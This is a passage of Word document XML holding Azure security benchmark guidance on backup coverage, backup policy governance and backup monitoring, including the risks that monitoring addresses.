          <w:ilvl w:val="0"/>
          <w:numId w:val="304"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004573A2">
        <w:t>Schedule backup operations during low-activity periods minimizing performance impact on production workloads while ensuring backup completion before next cycle.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A32179D" w14:textId="3D83CB40" w:rsidR="0028327A" w:rsidRDefault="0028327A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="303"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0028327A">
        <w:t>Backup coverage strategy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54767E1D" w14:textId="04550645" w:rsidR="0028327A" w:rsidRDefault="0028327A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0028327A">
        <w:t>Virtual machine protection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0234F4CE" w14:textId="0257BE4A" w:rsidR="0028327A" w:rsidRDefault="0028327A" w:rsidP="0028327A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="3240"/>
      </w:pPr>
      <w:r w:rsidRPr="0028327A">
        <w:t>Enable Azure Backup for all production Azure VMs with application-consistent backups for Windows and file-system consistent backups for Linux capturing complete system state</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF94A31" w14:textId="4141A78F" w:rsidR="0028327A" w:rsidRDefault="0028327A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0028327A">
        <w:t>Database backup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B56FED" w14:textId="4328A1FB" w:rsidR="0028327A" w:rsidRDefault="0028327A" w:rsidP="0028327A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="3240"/>
      </w:pPr>
      <w:r w:rsidRPr="0028327A">
        <w:t>Configure automated backup for Azure SQL Database, Azure Database for PostgreSQL, SQL Server on Azure VMs, and SAP HANA databases with transaction log backups for point-in-time recovery.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="147A95FC" w14:textId="265927C7" w:rsidR="00017138" w:rsidRDefault="00017138">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00017138">
        <w:t>Storage account protection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F6F249" w14:textId="24286DD6" w:rsidR="00017138" w:rsidRDefault="00017138" w:rsidP="00017138">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="3240"/>
      </w:pPr>
      <w:r w:rsidRPr="00017138">
        <w:t>Enable Azure Backup for Azure Files, configure blob versioning and soft delete for Azure Blob Storage, and implement operational backup for blobs requiring frequent restore.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33342952" w14:textId="4A28899E" w:rsidR="00017138" w:rsidRDefault="00017138">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00017138">
        <w:t>Disk-level protection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42AB02D5" w14:textId="48F0CB91" w:rsidR="00017138" w:rsidRDefault="00017138" w:rsidP="00017138">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="3240"/>
      </w:pPr>
      <w:r w:rsidRPr="00017138">
        <w:lastRenderedPageBreak/>
        <w:t>Enable Azure Disk Backup for managed disks requiring independent backup from VM-level protection providing granular recovery options.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="509DD4BC" w14:textId="1E6A330E" w:rsidR="00017138" w:rsidRDefault="00017138" w:rsidP="00017138">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00017138">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>BR-1.2: Implement backup for unsupported resources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A4630CA" w14:textId="116326DD" w:rsidR="00017138" w:rsidRDefault="00017138">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="305"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00017138">
        <w:t>Native backup implementation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A04014C" w14:textId="7CE0ACF7" w:rsidR="00017138" w:rsidRDefault="00017138">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00017138">
        <w:t>Enable Azure Key Vault backup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="285BE3B5" w14:textId="070170E9" w:rsidR="00017138" w:rsidRDefault="00017138">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="306"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00017138">
        <w:t>Implement Azure Key Vault native backup for secrets, keys, and certificates establishing automated export and secure storage of cryptographic materials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D77835D" w14:textId="16B98AA3" w:rsidR="00017138" w:rsidRDefault="00017138">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00017138">
        <w:t>Configure storage account features</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4496FF17" w14:textId="30452E8C" w:rsidR="00017138" w:rsidRDefault="00017138">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="306"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00017138">
        <w:t>Enable blob versioning, soft delete, and point-in-time restore for Azure Storage accounts providing native data protection without separate backup infrastructure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B38DE5" w14:textId="77777777" w:rsidR="00017138" w:rsidRDefault="00017138" w:rsidP="00017138">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="3240"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EC21749" w14:textId="77777777" w:rsidR="00017138" w:rsidRDefault="00017138" w:rsidP="00017138">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="3240"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="463991D2" w14:textId="7661AEA9" w:rsidR="00017138" w:rsidRDefault="00017138">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00017138">
        <w:t>Implement container registry backup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B7539BA" w14:textId="52044492" w:rsidR="00017138" w:rsidRDefault="00017138">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="306"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00017138">
        <w:t>Enable geo-replication for Azure Container Registry and implement automated image export to secondary storage ensuring container image recovery capability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02459165" w14:textId="092F6CA9" w:rsidR="00017138" w:rsidRDefault="00017138">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00017138">
        <w:t>Configure Cosmos DB backup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AFF697D" w14:textId="6713F2BD" w:rsidR="00017138" w:rsidRDefault="00017138">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="306"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00017138">
        <w:t>Enable continuous backup mode for Azure Cosmos DB accounts providing point-in-time restore capability with 30-day retention or configure periodic backup with customizable intervals.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C75F13D" w14:textId="707EB96F" w:rsidR="00CE6486" w:rsidRDefault="00CE6486">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="305"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE6486">
        <w:t>Custom backup solutions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43477053" w14:textId="63216E42" w:rsidR="00CE6486" w:rsidRDefault="00CE6486">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE6486">
        <w:t>Export configuration as code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68AD0230" w14:textId="526507F5" w:rsidR="00CE6486" w:rsidRDefault="00CE6486">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="307"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE6486">
        <w:t xml:space="preserve">Export Azure resource configurations to Azure Resource Manager templates, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CE6486">
        <w:t>Terraform</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CE6486">
        <w:t xml:space="preserve"> configurations, or Bicep files storing in version-controlled repositories enabling infrastructure recovery.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E1B8D30" w14:textId="34E22A33" w:rsidR="00CE6486" w:rsidRDefault="00CE6486">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE6486">
        <w:t>Implement application-level backup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="522038F2" w14:textId="7F7E6387" w:rsidR="00CE6486" w:rsidRDefault="00CE6486">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="308"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE6486">
        <w:t xml:space="preserve">Design application-specific backup mechanisms for resources lacking native backup including data </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE6486">
        <w:lastRenderedPageBreak/>
        <w:t>export scripts, configuration snapshots, and state preservation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E376E31" w14:textId="50F32952" w:rsidR="00CE6486" w:rsidRDefault="00CE6486">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE6486">
        <w:t>Configure Azure Automation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CCDB5F3" w14:textId="077251CC" w:rsidR="00CE6486" w:rsidRDefault="00CE6486">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="309"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE6486">
        <w:t>Create Azure Automation runbooks for custom backup workflows automating resource configuration export, data snapshots, and backup validation for unsupported resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="155CE282" w14:textId="52634E9A" w:rsidR="00CE6486" w:rsidRDefault="00CE6486">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE6486">
        <w:t>Establish service-specific procedures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01168620" w14:textId="63EBB77B" w:rsidR="00CE6486" w:rsidRDefault="00CE6486">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="309"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE6486">
        <w:t>Document and automate backup procedures for each resource type without native support ensuring consistent protection and recovery capability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27370B12" w14:textId="77777777" w:rsidR="00CE6486" w:rsidRDefault="00CE6486" w:rsidP="00CE6486"/>
    <w:p w14:paraId="10095030" w14:textId="77777777" w:rsidR="00CE6486" w:rsidRDefault="00CE6486" w:rsidP="00CE6486"/>
    <w:p w14:paraId="3033FC41" w14:textId="5969F546" w:rsidR="00CE6486" w:rsidRDefault="00CE6486" w:rsidP="00CE6486">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE6486">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>BR-1.3: Enforce backup policies through governance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FEBC0CA" w14:textId="0D203E38" w:rsidR="00CE6486" w:rsidRDefault="00CE6486">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="310"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE6486">
        <w:t>Policy-based backup enforcement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7167922F" w14:textId="5D5D2E83" w:rsidR="00CE6486" w:rsidRDefault="00CE6486">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE6486">
        <w:t>Deploy built-in backup policies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="329322E9" w14:textId="029D9A83" w:rsidR="00CE6486" w:rsidRDefault="00CE6486">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="311"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE6486">
        <w:t>Assign Azure Policy definitions including "Configure backup on virtual machines" and "Azure Backup should be enabled for Virtual Machines" ensuring automatic compliance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E8EE35D" w14:textId="1D9B42C4" w:rsidR="00CE6486" w:rsidRDefault="00CE6486">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE6486">
        <w:t>Configure automatic remediation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="572924F3" w14:textId="42E00470" w:rsidR="00CE6486" w:rsidRDefault="00CE6486">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="311"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE6486">
        <w:t>Enable automatic remediation on backup policies ensuring non-compliant resources are automatically configured with appropriate backup protection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB41721" w14:textId="16432282" w:rsidR="00CE6486" w:rsidRDefault="00CE6486">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE6486">
        <w:t>Define policy assignment scope</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="296D25AC" w14:textId="42D2ABB6" w:rsidR="00CE6486" w:rsidRDefault="00CE6486">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="311"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE6486">
        <w:t>Apply backup policies at management group or subscription level providing centralized governance across multiple subscriptions and resource groups.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="022B6D00" w14:textId="0F16E1B4" w:rsidR="00CE6486" w:rsidRDefault="00CE6486">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE6486">
        <w:t>Implement compliance monitoring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D9C84E" w14:textId="5042BFEB" w:rsidR="00CE6486" w:rsidRDefault="00CE6486">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="311"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE6486">
        <w:t>Configure Azure Policy compliance dashboards tracking backup coverage across resources identifying gaps requiring attention.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02728BFE" w14:textId="054F2CFE" w:rsidR="00CE6486" w:rsidRDefault="00CE6486">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="310"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE6486">
        <w:t>Backup governance framework</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="768B6D6E" w14:textId="75EB307C" w:rsidR="00CE6486" w:rsidRDefault="00CE6486">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE6486">
        <w:t>Establish backup standards</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DEE7830" w14:textId="4A7BDCA6" w:rsidR="00CE6486" w:rsidRDefault="00CE6486">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="312"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE6486">
        <w:lastRenderedPageBreak/>
        <w:t>Define organizational backup standards specifying required frequency, retention, and protection levels for different resource classifications and criticality tiers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="214B33E9" w14:textId="44757729" w:rsidR="00CE6486" w:rsidRDefault="00CE6486">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE6486">
        <w:t>Create resource tagging strategy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0212B2EB" w14:textId="6D93DBB7" w:rsidR="00CE6486" w:rsidRDefault="00CE6486">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="312"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE6486">
        <w:t>Implement resource tags indicating backup requirements, retention periods, and recovery priorities enabling automated policy application based on metadata.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6DC84B" w14:textId="093C13B6" w:rsidR="00CE6486" w:rsidRDefault="00CE6486">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE6486">
        <w:t>Configure policy exemptions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30270981" w14:textId="44FA10FC" w:rsidR="00CE6486" w:rsidRDefault="00CE6486">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="312"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE6486">
        <w:t>Establish formal exception process for resources requiring non-standard backup configurations with documented business justification and compensating controls.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688482C6" w14:textId="77777777" w:rsidR="00CE6486" w:rsidRDefault="00CE6486" w:rsidP="00CE6486"/>
    <w:p w14:paraId="386E840E" w14:textId="1CD7821C" w:rsidR="00CE6486" w:rsidRDefault="00CE6486">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE6486">
        <w:t>Monitor policy effectiveness</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31CEE575" w14:textId="7E27E0DC" w:rsidR="00CE6486" w:rsidRDefault="00CE6486">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="312"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE6486">
        <w:t xml:space="preserve">Review policy compliance reports regularly </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CE6486">
        <w:t>identifying</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CE6486">
        <w:t xml:space="preserve"> policy gaps, exemption abuse, and opportunities for </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CE6486">
        <w:t>governance improvement</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CE6486">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="134937B2" w14:textId="6A120325" w:rsidR="00E310AB" w:rsidRDefault="00E310AB" w:rsidP="00E310AB">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="112" w:name="_Toc242449575"/>
      <w:r w:rsidRPr="00E310AB">
        <w:t>BR-3: Monitor backups</w:t>
      </w:r>
      <w:bookmarkEnd w:id="112"/>
    </w:p>
    <w:p w14:paraId="015E36F2" w14:textId="6F9D2311" w:rsidR="00E310AB" w:rsidRDefault="00E310AB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="313"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E310AB">
        <w:t>Security principle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013F2C4D" w14:textId="59D2D081" w:rsidR="00E310AB" w:rsidRDefault="00E310AB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E310AB">
        <w:t>Implement continuous monitoring of backup operations, coverage, and compliance ensuring all business-critical resources maintain protection meeting defined standards. Monitor backup health, detect failures, and alert on anomalies enabling rapid response to backup issues before they impact recovery capability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B5FA90" w14:textId="71AB42E5" w:rsidR="00E310AB" w:rsidRDefault="00E310AB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="313"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E310AB">
        <w:t xml:space="preserve">Risk </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E310AB">
        <w:t>to mitigate</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="6B8C5594" w14:textId="74AD6DBC" w:rsidR="00E310AB" w:rsidRDefault="00E310AB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E310AB">
        <w:t>Silent backup failures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C7785BD" w14:textId="5ED024D7" w:rsidR="00E310AB" w:rsidRDefault="00E310AB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="314"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E310AB">
        <w:t>Backup jobs fail without detection leaving resources unprotected with outdated or missing backup copies discovered only during recovery attempts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24023BFC" w14:textId="54EAD1D0" w:rsidR="00E310AB" w:rsidRDefault="00E310AB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E310AB">
        <w:t>Coverage gaps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B5221C6" w14:textId="4ADE3173" w:rsidR="00E310AB" w:rsidRDefault="00E310AB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="314"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E310AB">
        <w:t xml:space="preserve">New resources deployed without backup protection remain vulnerable to data loss while appearing in </w:t>
      </w:r>
      <w:r w:rsidRPr="00E310AB">
        <w:lastRenderedPageBreak/>
        <w:t>asset inventories suggesting comprehensive protection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE8EF0E" w14:textId="03D6AA6F" w:rsidR="00E310AB" w:rsidRDefault="00E310AB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E310AB">
        <w:t>Configuration drift</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2220606F" w14:textId="478748B3" w:rsidR="00E310AB" w:rsidRDefault="00E310AB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="314"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E310AB">
        <w:t>Backup policies and retention settings change through unauthorized modifications weakening protection without visibility or alerting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B1AD5DF" w14:textId="7831E586" w:rsidR="00E310AB" w:rsidRDefault="00E310AB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E310AB">
        <w:t>Compliance violations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB0F4B5" w14:textId="7DE412E8" w:rsidR="00E310AB" w:rsidRDefault="00E310AB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="314"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E310AB">
        <w:t>Resources missing required backup protection create regulatory audit failures and penalties discovered only during compliance assessments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D180B1" w14:textId="28F4B0C9" w:rsidR="00E310AB" w:rsidRDefault="00E310AB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E310AB">
        <w:t>Capacity issues</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="784655FD" w14:textId="11CD3B88" w:rsidR="00E310AB" w:rsidRDefault="00E310AB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="314"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E310AB">
        <w:t>Backup storage capacity exhaustion prevents new backups from succeeding causing silent protection degradation across resources.</w:t>
      </w:r>
    </w:p>
